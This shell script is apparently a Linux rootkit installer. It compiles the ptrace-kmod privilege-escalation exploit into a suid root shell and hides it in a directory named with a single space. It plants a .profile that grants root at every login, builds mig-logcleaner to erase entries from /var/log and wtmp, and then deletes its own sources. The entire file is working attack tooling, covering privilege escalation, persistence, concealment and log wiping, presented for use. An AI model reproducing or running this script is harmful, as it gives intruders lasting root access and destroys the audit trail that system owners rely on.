#!/bin/sh
# Under GPL 2.0 and above
# use at your own risk.
# Compiles ptrace-kmod and uses ptrace as suid shell that drops privileges
# set ups .profile file so every time the user logins he gets root
# and mig cleaner in combination with log_clean.sh does clean
# some "useless" ;]]] data from the /var/log files and wtmp. 

# directory where needed files reside. 
secret_dir=$PWD/' ';
# suid shell src name
suid_sh_src='ptrace-kmod.c';
# compiled suid shell name
new_name=gsh;
# profile sample 
prof_samp='profile.sample';
# new name of the profile use .bash_profile for /bin/bash 
prof_samp_new='.profile';
# miglog's name 
miglog_name='mig-logcleaner';
# mig log's compiled binary name
new_miglog_name='mig';
# os type to compile mig-logcleaner for
os_type='linux';

enter_dir () {
if [ -d "$secret_dir" ]; then
cd "$secret_dir";
fi
}

compile_suid_sh () {
if [ -f "$suid_sh_src" ]; then
echo "Compiling suid shell ...";
gcc -o `echo $suid_sh_src |sed -e 's#\.c##g'` $suid_sh_src;
mv `echo $suid_sh_src |sed -e 's#\.c##g'` $new_name;
else
echo "Missing $suid_sh_src ...";
fi
}

dearchive_and_compile_miglog () {
if [ -f "$miglog_name".tar.gz ]; then
echo "Dearchiving and compiling mig-logcleaner";
tar -zxf ${miglog_name}.tar.gz;
cd ${miglog_name};
make $os_type &>/dev/null;
mv ${miglog_name} ../${new_miglog_name}; 
cd ..
fi

}

copy_skele () {
echo "Putting profile ...";
cp -rpf ../$prof_samp ../$prof_samp_new; 
}

get_rid_of_junk () {
echo "Getting rid of junk files ...";
rm -f ${suid_sh_src};
rm -fr README ${miglog_name} ${miglog_name}.tar.gz;
rm -f ../$prof_samp; 
echo "Congrats all is supposed to be setupped correctly!";
};

main () {
enter_dir;
compile_suid_sh;
dearchive_and_compile_miglog;
copy_skele;
get_rid_of_junk
}

main;
